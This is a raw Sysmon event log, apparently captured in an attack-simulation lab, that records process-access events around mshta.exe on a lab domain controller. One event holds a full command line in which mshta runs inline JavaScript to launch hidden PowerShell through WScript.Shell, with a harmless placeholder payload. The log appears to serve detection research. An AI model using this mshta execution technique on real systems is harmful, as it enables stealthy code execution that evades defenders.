15:59:42.366{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.366{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.366{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.366{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.366{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.350{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.350{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.334{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.334{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.334{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.334{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.334{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.334{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000027317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.339{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "javascript:a=new ActiveXObject("WScript.Shell");a.Run("powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit",0,true);close();"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000027316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536D-6008-7306-00000000A301}7972C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet 